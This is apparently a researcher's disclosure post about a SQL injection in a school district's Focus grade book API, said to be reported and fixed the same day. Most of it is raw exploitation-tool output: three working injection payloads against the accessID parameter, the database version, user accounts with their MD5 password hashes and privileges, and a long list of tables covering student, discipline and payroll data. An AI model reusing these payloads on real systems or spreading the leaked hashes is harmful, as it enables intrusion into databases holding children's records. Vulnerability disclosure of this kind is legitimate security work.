🔓 First Focus Paper by John Bell 🔓
In Early December 2019 I Identified the Following SQLi Vulnerability in the Focus Grade Book
The Vulnerable API Endpoint is Located at /focus/legacy_API/APIEndpoint.php
** Reported at Dec 6, 2019, 5:00 PM **
** Fixed at Dec 6, 2019, 5:18 PM **
*************************
***** John Bell ***
**** Focus Paper ****
*** DECEMBER 2019 *****
*************************
Exploited GET Parameter: accessID
(1)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: api&method&signature&accessID=1 AND 4257=(SELECT (CASE WHEN (4257=4257) THEN 4257 ELSE (SELECT 3158 UNION SELECT 8852) END))-- QPJB
Vector: AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))[GENERIC_SQL_COMMENT]
(2)
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: api&method&signature&accessID=1 AND 9449=CAST((CHR(113)||CHR(113)||CHR(106)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (9449=9449) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(113)||CHR(107)||CHR(113)) AS NUMERIC)
Vector: AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)
(3)
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: api&method&signature&accessID=1 AND 8985=(SELECT 8985 FROM PG_SLEEP(5))
Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
back-end DBMS: PostgreSQL
back-end DBMS Version: 'PostgreSQL 10.3 on x86_64-pc-linux-gnu, compiled by gcc (GCC) 4.4.7 20120313 (Red Hat 4.4.7-18), 64-bit'
back-end operating system: Linux Red Hat
Exploited User: 'polk_focus'
[*] polk_ro
[*] polk_rw
[*] postgres
[*] tsteorts
[*] tvanpool
[*] wbusr_ro
[*] automato_user
[*] penny_cook_ro
[*] fiat_user
[*] evolve_user
[*] polk_focus
Database User Password Hashes:
[*] polk_ro, md519b398c826390d16c7b65c908786be41
[*] polk_rw, md5cf98cb4be751c71916e3172eb10b8578
[*] postgres, md5c82995ee1c80f970c5eb286aa3c88605
[*] tsteorts, md5d7183c5c37fb3ab22580626ffa366bac
[*] tvanpool, md53a7fe193a9760aacc7b3d43276c6abfb
[*] wbusr_ro, md53510aa5ff3242d36879181f9c7adb6ad
[*] automato_user, md5f1065ed76114c968dda0c18257939cf9
[*] penny_cook_ro, md594e95fef8a2174a6a907237ca8dd3bcc
[*] fiat_user, md5480508c92ffb7d2dd3a7d7865258efc4
[*] evolve_user, md50fc5dfc7c69771b640fcf39e630f69b7
[*] polk_focus, md5fb21963a3f30d3b186ca431c61194072
Database User Privileges:
[*] automato_user [0]:
[*] evolve_user [0]:
[*] fiat_user [0]:
[*] penny_cook_ro [0]:
[*] polk_focus (administrator) [1]:
privilege: super
[*] polk_ro [0]:
[*] polk_rw [0]:
[*] postgres (administrator) [2]:
privilege: createdb
privilege: super
[*] tsteorts (administrator) [1]:
privilege: super
[*] tvanpool (administrator) [1]:
privilege: super
[*] wbusr_ro [0]:
[*] _pg_foreign_tables
[*] _school_quarters_mp_backup
[*] administrable_role_authorizations
[*] application
[*] arq
[*] available_reenrollment_form
[*] check_constraint_routine_usage
[*] check_constraints
[*] collation_character_set_applicability
[*] collations
[*] column_privileges
[*] columns
[*] constraint_table_usage
[*] course_period_group
[*] course_periods_partial_20190929_0931
[*] courses_exceptions_temp
[*] custom_field_categories_join_schools
[*] custom_field_select_options_pbackup_sid518_career_academies
[*] custom_reports_folders
[*] discipline_incidents_view
[*] domain_udt_usage
[*] domains
[*] element_types
[*] enabled_roles
[*] fas_test_data_sharing_custom
[*] faster_responses
[*] florida_fedstateevaluation_dfile
[*] florida_safetyreport_dfile
[*] florida_staffbenefits_validation
[*] florida_staffdemographicinfo_edit
[*] florida_staffexperience_edit_dq2
[*] florida_staffexperience_validation_dq2
[*] florida_stafffysalaries_edit
[*] florida_wdiscteschedule_ofile
[*] florida_wdiscteschedule_validation
[*] foreign_data_wrappers
[*] foreign_servers
[*] forum_user
[*] gl_ap_approval_record
[*] gl_ap_invoice
[*] gl_ba_checks
[*] gl_ba_checks_imported
[*] gl_element_category
[*] gl_element_request
[*] gl_import_static_fields
[*] gl_pr_current_fyear_job_wages
[*] gl_pr_deduction_absentee_list
[*] gradebook_comment_codes
[*] imm_ruleset_groups
[*] importer_templates
[*] info_change_requests
[*] master_courses
[*] master_schedule_snapshot_course_periods
[*] master_schedule_snapshot_courses
[*] master_schedule_snapshot_schedule
[*] master_schedule_snapshots
[*] mckay_payment_download
[*] pg_attrdef
[*] pg_auth_members
[*] pg_cast
[*] pg_conversion
[*] pg_description
[*] pg_foreign_table
[*] pg_hba_file_rules
[*] pg_index
[*] pg_indexes
[*] pg_inherits
[*] pg_policies
[*] pg_prepared_xacts
[*] pg_range
[*] pg_replication_origin
[*] pg_rewrite
[*] pg_seclabel
[*] pg_seclabels
[*] pg_sequence
[*] pg_stat_database_conflicts
[*] pg_statio_all_tables
[*] pg_tables
[*] pg_ts_config_map
[*] pg_ts_parser
[*] pg_ts_template
[*] pg_user
[*] pg_user_mappings
[*] polk_dps_f60775_1819
[*] polk_dw_ca_student_hs_20182019
[*] polk_dw_ca_student_hs_academy_20182019
[*] polk_f60775o_y18195_temp
[*] polk_f61020o_y18192_temp
[*] polk_ft_vfocuspolkstaff
[*] polk_temp_career_academy_course_school_temp
[*] polk_temp_workforce_updatech1415_temp
[*] positive_behavior_types
[*] positive_behaviors_title_join_schools
[*] reauthorization_grade_validation
[*] referral_actions_backup_20191020
[*] referral_actions_backup_20191021
[*] referral_teacher_codes
[*] report_card_benchmarks
[*] role_column_grants
[*] role_table_grants
[*] role_udt_grants
[*] routines
[*] school_locations
[*] school_quarters
[*] schools_view
[*] sequences
[*] sql_parts
[*] ssrs_batch
[*] standards_grades_completed
[*] student_report_card_grades
[*] table_constraints
[*] table_privileges
[*] tables
[*] test_history_score_range_sublevels
[*] test_score_reports
[*] update_audit
[*] usage_privileges
[*] user_mapping_options
[*] user_permissions
[*] vw_polk_moodle_usercourse
[*] vw_polk_parent_student_attached
[*] vw_polk_sap_out_of_field_extract
[*] vw_polk_students
[*] vw_polk_students_active
[*] vw_polk_students_emergency_contacts
[*] vw_xfer_markingperiods
[*] web_page
[*] web_page_section
[*] _pg_foreign_data_wrappers
[*] attendance_period
[*] attributes
[*] calendar_event_categories
[*] calendar_event_requests
[*] calendar_events
[*] calendar_multiple_events
[*] calendar_user_date_availability
[*] course_periods
[*] course_periods_backup_20190220
[*] course_periods_does_grades_1_20190926
[*] custom_field_log_entries_backup_20191022
[*] demographic_report_queries
[*] discipline_incidents
[*] discipline_incidents_form_records_view
[*] discipline_referrals_log_entries_backup_20191020
[*] discipline_referrals_view
[*] external_api
[*] fas_test_data_sharing_type
[*] fas_tests
[*] florida_staffbenefits_validation_dq2
[*] florida_staffpayrollinfo_ofile
[*] florida_wdisadultschedule_initial
[*] florida_wdiscteschedule_edit
[*] gl_ap_approval_substitute
[*] gl_pr_staff_job_positions
[*] gl_wh_transaction
[*] html_partial
[*] logging_fields_select_options
[*] master_schedule_snapshot_course_weights
[*] mckay_payment
[*] pg_aggregate
[*] pg_attribute
[*] pg_authid
[*] pg_config
[*] pg_language
[*] pg_locks
[*] pg_namespace
[*] pg_publication
[*] pg_sequences
[*] pg_stat_database
[*] pg_stat_progress_vacuum
[*] pg_stat_xact_user_tables
[*] pg_statio_sys_sequences
[*] pg_statio_user_tables
[*] pg_stats
[*] pg_timezone_names
[*] pg_transform
[*] pg_views
[*] polk_temp_cfle_conversion_afterver91_20191022
[*] polk_val_career_academy
[*] schedule_enrollment_codes
[*] ssrs_publish
[*] student_enrollment_backup_20190812
[*] student_enrollment_before_wd_20190701_0400
[*] student_report_card_grades_change_requests
[*] view_routine_usage
[*] vw_polk_dw_eoy_school_random_counts_percents
[*] vw_polk_journey_courses
[*] vw_polk_moodle_course
[*] vw_polk_socialworkerstudent
[*] vw_polk_student_enrollment
[*] web_page_profile
[*] xfer_tha
[*] _school_years_mp_backup
[*] course_period_group_option
[*] doe_recalibrated_fte
[*] florida_discipline_edit
[*] florida_fedstateevaluation_validation_dq2
[*] florida_stafffysalaries_edit_dq2
[*] florida_wdissupplementalinfo_dfile
[*] florida_wdissupplementalinfo_initial
[*] florida_wdissupplementalinfo_validation_dq2
[*] florida_wdistest_dfile
[*] focus_files
[*] foreign_data_wrapper_options
[*] gl_ap_invoice_ach
[*] gl_import_transforms
[*] gl_manual_journal_validation
[*] gl_pr_current_fyear_job_wages_paid
[*] gl_pr_mileage_rate
[*] master_schedule_snapshot_course_subjects
[*] people_join_contacts
[*] pg_available_extensions
[*] pg_group
[*] pg_stat_xact_sys_tables
[*] pg_user_mapping
[*] schedule_inclusion_details
[*] schoolchoicecatalog_temp
[*] user_mappings
[*] users_form_records_view
[*] vw_polk_students_address_zones
[*] web_page_post
[*] xfer_status
[*] florida_wdisadultschedule_ofile
[*] districts
[*] pg_statistic_ext
[*] gl_ap_approval_node
[*] pg_subscription_rel
[*] gl_wh_maintenance_request_items
[*] attendance_codes_post_copyschool
[*] pg_depend
[*] address_to_district
[*] course_to_voc
[*] student_report_card_benchmarks
[*] _pg_user_mappings
[*] polk_f60954o_y18193_temp
[*] pg_publication_rel
[*] task_events
[*] schemata
[*] student_report_card_grades_backup_20190701
[*] pg_replication_origin_status
[*] gl_pr_leave_code_group
[*] pg_available_extension_versions
[*] polk_temp_career_academy_course_school_temp_2
[*] tardy_threshold_school_period
[*] calendar_user_availability
[*] pg_stat_archiver
[*] key_column_usage
[*] pg_shadow
[*] discipline_referrals_bup_focus_20180808
[*] gl_pos_merchant_account
[*] pg_largeobject
[*] school_folder_user
[*] florida_staffaddljobassn_edit
[*] column_options
[*] applicable_roles
[*] triggered_update_columns
[*] ssrs_publish_school
[*] pg_amop
[*] vw_polk_markingperiods_sem_year
[*] polk_f60953o_y18195_temp
[*] pg_stat_sys_indexes
[*] polk_schoolmessenger_adult
[*] positive_behavior_stickers
[*] login_token
[*] polk_f60775o_y18193_temp
[*] polk_temp_polkusers_users_new_username_temp
[*] custom_fields
[*] pg_timezone_abbrevs
[*] florida_inout_cert_groups
[*] referential_constraints
[*] saved_reports
[*] grad_subject_credit_course
[*] pg_matviews
[*] gl_ap_approval_link
[*] pg_amproc
[*] pg_policy
[*] florida_englishlanguagelearn_initial
[*] role_routine_grants
[*] discipline_referrals_form_records
[*] vw_polk_journey_courses_coteacher
[*] florida_wdisadultschedule_validation
[*] florida_exceptionalstudent_dfile
[*] pg_subscription
[*] florida_wdissupplementalinfo_edit
[*] polk_temp_rangeaddresscatalog_dom_temp
[*] referral_actions_20191022_0913
[*] florida_staffaddljobassn_ofile
[*] sql_messages
[*] rq
[*] pg_statistic
[*] discipline_incidents_form_records
[*] pg_publication_tables
[*] view_table_usage
[*] students_backup_20190925
[*] pg_stat_xact_user_functions
[*] pg_stat_ssl
[*] web_page_post_profile
[*] pg_stat_replication
[*] grad_requirements_category
[*] pg_pltemplate
[*] pg_am
[*] polk_mindshare_import_temp
[*] polk_curriculum_oneroster_district_administrator__20190418_1644
[*] pg_stat_all_tables
[*] calendar_events_request_conference
[*] pg_settings
[*] discipline_referrals_backup_20191020
[*] domain_constraints
[*] pg_init_privs
[*] gl_element_accounts
[*] polk_f60951o_y18195_temp
[*] pg_extension
[*] students_view
[*] courses
[*] florida_stafffysalaries_validation_dq2
[*] course_period_group_join
[*] transforms
[*] column_domain_usage
[*] efc_award
[*] florida_multi_certifications
[*] fas_test_time_windows
[*] pg_stat_all_indexes
[*] pg_shdescription
[*] pg_stat_wal_receiver
[*] custom_field_log_entries_disc_20191022_0958_bef_upd_field1
[*] pg_operator
[*] pg_rules
[*] ssrs_batch_record
[*] florida_wdissupplementalinfo_edit_dq2
[*] pg_stat_user_functions
[*] custom_fields_join_categories
[*] pg_opfamily
[*] udt_privileges
[*] pg_statio_all_sequences
[*] school_years
[*] calendar_user_setup
[*] gl_pos_outside_source_check
[*] attendance_code_categories
[*] florida_staffaddljobassn_edit_dq2
[*] vw_polk_student_career_academy_ew
[*] polk_temp_career_academy_course_school_temp_backup_20190201
[*] password_recovery_log
[*] pg_roles
[*] vw_polk_journey_courses_inclusion
[*] course_periods_backup_20190905
[*] courseperiodstempimporter_dup
[*] wdis_verification
[*] pg_shdepend
[*] faster_batches
[*] polk_f61020o_y18195_temp
[*] vw_polk_students_active_enrollments
[*] polk_temp_home_education_data_to_load_temp
[*] pg_foreign_server
[*] pg_prepared_statements
[*] pg_ts_config
[*] report_card_batches
[*] pg_shseclabel
[*] discipline_referrals_20191030_bef_custom_52_conv_aft_ver9_1
[*] pg_stat_user_tables
[*] parameters
[*] role_usage_grants
[*] attendance_calendar_backup_20190220
[*] data_type_privileges
[*] pg_event_trigger
[*] gl_ap_approval_permission
[*] pg_replication_slots
[*] sql_languages
[*] marking_periods
[*] polk_val_career_academy__pbak_20191204_1254
[*] calendar_event_participants
[*] pg_statio_user_indexes
[*] florida_wdiscteschedule_validation_dq2
[*] discipline_fields
[*] student_enrollment_codes
[*] school_semesters
[*] polk_f71433o_y18195_temp
[*] letters_discipline_20938
[*] fas_test_data_import_info
[*] pg_proc
[*] pg_database
[*] fee_refund_log
[*] fcat_fsa_ela_level_one
[*] vw_polk_student_enrollment_latest
[*] foreign_server_options
[*] custom_field_log_entries_pbackup_fid724_caew
[*] fas_test_sections
[*] foreign_tables
[*] database_object_log
[*] pg_trigger
[*] polk_f60775o_y18192_temp
[*] student_form_records_45
[*] florida_priorschool_edit_dq2
[*] pg_partitioned_table
[*] polk_versatrans_import_temp
[*] sql_sizing
[*] gl_requests
[*] florida_priorschool_initial
[*] match_students_importer_table_temp_file_data
[*] pg_stat_bgwriter
[*] users_view
[*] polk_daily_absences
[*] florida_wdiscteschedule_initial
[*] gl_manual_journal_draft
[*] sql_sizing_profiles
[*] column_udt_usage
[*] custom_field_categories
[*] pg_enum
[*] polk_val_career_academy_school_xref
[*] pg_class
[*] pg_stat_xact_all_tables
[*] views
[*] pg_type
[*] application_polk_students_deleted
[*] pg_constraint
[*] discipline_referrals_form_records_view
[*] yodlee_account
[*] sql_packages
[*] grad_subjects
[*] vw_polk_students_latest_prim_enr_reg_sy
[*] triggers
[*] gl_element_bk_change
[*] tardy_threshold_attendance_code
[*] routine_privileges
[*] florida_stafffybenefits_edit_dq2
[*] letters_discipline_20937
[*] polk_dw_student_end_of_year_summary_20182019
[*] students_form_records_view
[*] florida_staffpayrollinfo_edit
[*] gl_import_logic
[*] tasks
[*] constraint_column_usage
[*] vw_polk_moodle_usercourse_hope
[*] vw_polk_students_automato
[*] pg_db_role_setting
[*] vw_polk_moodle_students_active
[*] florida_wdiscteschedule_dfile
[*] pg_stat_activity
[*] polk_temp_cfle_conversion_afterver91_20191028
[*] pg_statio_all_indexes
[*] view_column_usage
[*] calendar_event_requests_batch
[*] school_progress_periods
[*] user_defined_types
[*] florida_ftp_learnfare
[*] application_layout_backup_20191121
[*] pg_stat_sys_tables
[*] florida_assessment_dfile
[*] discipline_referrals_log_entries_bup_focus_20180808
[*] custom_field_log_entries_20191029_bef_field_id_1991_conv
[*] fas_test_data
[*] ssrs_publish_grade_level
[*] gl_ba_checks_batch_481587
[*] pg_statio_sys_indexes
[*] pg_stat_subscription
[*] _pg_foreign_table_columns
[*] pg_tablespace
[*] reenrollment_request
[*] gl_pos_receipt_allocation
[*] pg_cursors
[*] gl_wh_routes
[*] polk_f60776o_y18193_temp
[*] vw_polk_students_fields
[*] pg_statio_sys_tables
[*] pg_opclass
[*] pg_largeobject_metadata
[*] _school_semesters_mp_backup
[*] polk_temp_direct_cert_from_school_nutrition_temp
[*] test_history_levels
[*] formbuilder_forms
[*] polk_frontline_classes
[*] polk_f71313o_y18195_temp
[*] tardy_threshold
[*] sequence_override_reason_options
[*] pg_stat_user_indexes
[*] _pg_foreign_servers
[*] database_migrations
[*] gl_initial_account_balance
[*] pg_collation
[*] florida_staffpayrollinfo_validation
[*] custom_field_select_options
[*] _school_progress_periods_mp_backup
[*] schools_form_records_view
[*] vw_markingperiods
[*] florida_wdissupplementalinfo_ofile
[*] pg_ts_dict
[*] pg_file_settings
[*] information_schema_catalog_name
[*] florida_staffpayrollinfo_initial
[*] notified_messages
[*] polk_temp_career_academy_course_school_temp_3
[*] gl_pr_leave_reasons
[*] foreign_table_options
[*] character_sets
[*] gl_import_tool_groups
[*] vw_polk_students_onesync
[*] pg_foreign_data_wrapper
[*] community_app_link_profile
[*] sql_features
[*] external_api_custom_field
[*] pg_default_acl
[*] polk_f61096o_y18195_temp
[*] __temp_ticket_polk_vision
[*] sql_implementation_info
[*] pg_statio_user_sequences
[*] students_backup_20190812
[*] polk_f62233o_y18195_temp